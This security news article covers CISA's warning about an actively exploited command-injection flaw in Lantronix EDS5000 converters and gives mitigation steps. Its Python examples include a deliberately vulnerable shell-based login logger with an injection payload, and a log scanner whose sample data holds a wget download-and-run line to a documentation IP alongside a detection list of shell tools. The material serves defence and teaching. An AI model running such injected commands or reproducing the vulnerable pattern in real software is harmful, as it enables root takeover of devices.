threat-wire
CISA Warns of Active Attacks on Lantronix Industrial Devices
CISA has confirmed attackers are actively exploiting CVE-2025-67038, a critical flaw in Lantronix EDS5000 serial-to-IP converters that hands over root access. Federal agencies were ordered to patch by 26 June. The devices connect older industrial and building equipment to networks, so a compromise can open a path deeper inside.
By SecureBusinessHub Editorial, International cybersecurity desk · 5 min read
CISA has put a hard deadline on a flaw it says is already being exploited. CVE-2025-67038 carries a CVSS score of 9.8 and affects Lantronix EDS5000 devices, the small boxes that connect serial equipment to an IP network. Federal civilian agencies were told to patch by 26 June 2026.
The flaw
The bug sits in the device's HTTP RPC module. When a login fails, the device writes a log entry by running a shell command, and it drops the username straight into that command without cleaning it first. An attacker can put operating system commands inside the username field, and the device runs them as root. No valid password is needed, because the flaw fires on the failed login itself.
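As an added illustration of the bug class described above (a Python model, not code from the EDS5000 firmware, which is not public here): a failed-login log hook that splices the username into a shell command line, beside a version that never touches a shell. The file paths live in a temporary directory and the injected payload is constructed for the demo.

```python
"""Failed-login logging: shell-injection pattern vs. hardened version.

Illustrative model of the bug class only; not code from the EDS5000 firmware.
"""
import os
import re
import subprocess
import tempfile


def log_failed_login_vulnerable(username: str, logfile: str) -> None:
    # VULNERABLE: the attacker-controlled username is spliced into a shell
    # command line. A double quote closes the string, and ; | ` $( ) become
    # shell syntax, so whatever follows runs with this process's privileges
    # (root, on an embedded device whose web daemon runs as root).
    cmd = f'echo "Failed login for user: {username}" >> "{logfile}"'
    subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, check=False)


# Allow-list for usernames; anything else is logged as data, never executed.
USERNAME_RE = re.compile(r"[A-Za-z0-9._@-]{1,64}")


def log_failed_login_hardened(username: str, logfile: str) -> bool:
    # HARDENED: no shell at all. The entry is written with ordinary file I/O,
    # and a username that fails the allow-list is still recorded (as a quoted
    # repr, so control characters stay visible) but flagged as rejected.
    if USERNAME_RE.fullmatch(username):
        entry = f"Failed login for user: {username}\n"
        accepted = True
    else:
        entry = f"Failed login, rejected malformed username {username!r}\n"
        accepted = False
    with open(logfile, "a", encoding="utf-8") as fh:
        fh.write(entry)
    return accepted


def demo(workdir: str = "") -> dict:
    """Run both loggers against the same constructed payload and report."""
    workdir = workdir or tempfile.mkdtemp(prefix="cmdinj-")
    marker = os.path.join(workdir, "pwned")
    # Constructed payload: closes the echo string, runs an injected command
    # that drops a marker file, then reopens a string so the line still parses.
    payload = f'x"; echo injected > "{marker}"; echo "'

    log_failed_login_vulnerable(payload, os.path.join(workdir, "vuln.log"))
    vuln_executed = os.path.exists(marker)
    if vuln_executed:
        os.remove(marker)

    hard_log = os.path.join(workdir, "hard.log")
    accepted = log_failed_login_hardened(payload, hard_log)
    with open(hard_log, encoding="utf-8") as fh:
        hard_entry = fh.read()

    return {
        "vulnerable_executed_payload": vuln_executed,
        "hardened_executed_payload": os.path.exists(marker),
        "hardened_accepted_username": accepted,
        "hardened_log_entry": hard_entry,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The point of the hardened version is not escaping: the moment a shell is removed from the path, quoting tricks have nothing to act on. The allow-list is a second layer that also makes the injection attempt stand out in the log.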
Forescout's Vedere Labs reported it in April 2026 as one of a set of vulnerabilities it called BRIDGE:BREAK, affecting serial-to-IP converters from Lantronix and Silex. The same research found similar weaknesses in Silex hardware, so a site that standardised on one brand of adapter could have dozens of identical units exposed at once. CISA has not said who is exploiting the flaw or how the attacks are being carried out.
Why these boxes matter
Serial-to-IP converters are easy to forget. They sit in plant rooms, on factory floors, and in building management closets, quietly bridging a decades-old serial device to the network so it can be monitored remotely. Because they are infrastructure rather than computers people log into, they often run old firmware and rarely get checked. That is exactly the kind of device an attacker wants: trusted, networked, and ignored.
What to check now
- Identify any Lantronix EDS5000 units on your network, including the EDS5008, EDS5016, and EDS5032 models.
- Confirm the firmware version. Release 2.1.0.0R3 is affected; update to the fixed build named in Lantronix's advisory.
- Take the web management interface of these devices off the public internet. They should never be reachable from outside your own network.
- Review device logs for failed-login entries with odd characters or shell syntax in the username, a sign of attempted command injection.
- If you cannot patch at once, restrict network access to the device to a short list of known management hosts.
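To act on the log-review item in the checklist, here is an added example (not part of the CISA notice or any Lantronix tooling) that scans failed-login entries for shell syntax and tool names in the username field and counts failures per source address. The log line format and the sample lines are constructed for the demo; a real device will log differently, so LINE_RE is the part to adapt.

```python
"""Flag failed-login log entries whose username field looks like an injection.

Added example; the line format and sample lines are constructed, not taken
from a real EDS5000 log.
"""
import re
from collections import Counter
from dataclasses import dataclass, field

# Hypothetical syslog-style format. Adapt this one regex to the real device.
LINE_RE = re.compile(r"login failed for user '(?P<user>.*)' from (?P<src>\S+)")

# Characters a POSIX shell interprets rather than treating as part of a name.
SHELL_SYNTAX = re.compile(r"[;&|<>`$\\\"'\n]")
# Downloaders and interpreters that recur in injected one-liners.
TOOL_NAMES = re.compile(r"\b(?:wget|curl|tftp|busybox|nc|sh|bash|telnet|chmod)\b")
MAX_SANE_USERNAME = 32

# Constructed sample log lines; 203.0.113.0/24 and 198.51.100.0/24 are
# documentation ranges, not real attacker addresses.
SAMPLE_LINES = [
    "Jun 12 10:15:02 eds5008 httpd: login failed for user 'admin' from 10.0.0.5",
    "Jun 12 10:15:09 eds5008 httpd: login failed for user "
    "'admin;wget http://203.0.113.7/x.sh -O /tmp/x;sh /tmp/x' from 203.0.113.7",
    "Jun 12 10:15:11 eds5008 httpd: login failed for user 'admin' from 203.0.113.7",
    "Jun 12 10:16:40 eds5008 httpd: login failed for user '$(id)' from 198.51.100.2",
    "Jun 12 10:17:01 eds5008 httpd: login failed for user 'j.smith' from 10.0.0.12",
    "Jun 12 10:17:05 eds5008 httpd: login ok for user 'j.smith' from 10.0.0.12",
]


@dataclass
class Hit:
    user: str
    src: str
    reasons: list = field(default_factory=list)
    line: str = ""


def analyze(lines):
    """Return (suspicious Hit list, Counter of failed logins per source)."""
    hits = []
    failures_by_src = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue  # not a failed-login line in the assumed format
        user, src = m.group("user"), m.group("src")
        failures_by_src[src] += 1
        reasons = []
        if SHELL_SYNTAX.search(user):
            reasons.append("shell metacharacters in username")
        if TOOL_NAMES.search(user):
            reasons.append("download or interpreter name in username")
        if len(user) > MAX_SANE_USERNAME:
            reasons.append(f"username longer than {MAX_SANE_USERNAME} chars")
        if reasons:
            hits.append(Hit(user=user, src=src, reasons=reasons, line=line))
    return hits, failures_by_src


if __name__ == "__main__":
    found, by_src = analyze(SAMPLE_LINES)
    for h in found:
        print(f"{h.src}: {h.user!r} -> {', '.join(h.reasons)}")
    print("failed logins per source:", dict(by_src))
```

A single hit is enough to treat the device as possibly compromised, because the flaw fires on the failed login itself: the attacker does not need the attempt to succeed, only to be logged. The per-source count is there to catch a noisier brute-force pattern from the same address that precedes or follows the injection attempt.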
Plenty of small firms own one of these without realising it, bundled into a CCTV setup, an access-control system, or a piece of leased machinery. If a contractor installed any building automation or industrial kit for you, ask whether a Lantronix device is part of it and whether it has been patched. CISA only adds a flaw to its Known Exploited Vulnerabilities catalog once real attacks are confirmed, so this is not a theoretical risk.
There is no public detail yet on who the attackers are or what they are after. What is clear is the prize: a root shell on a converter that bridges operational equipment is a strong place to stand, because from there an attacker can pivot off the quiet device and into the machines it was wired to control.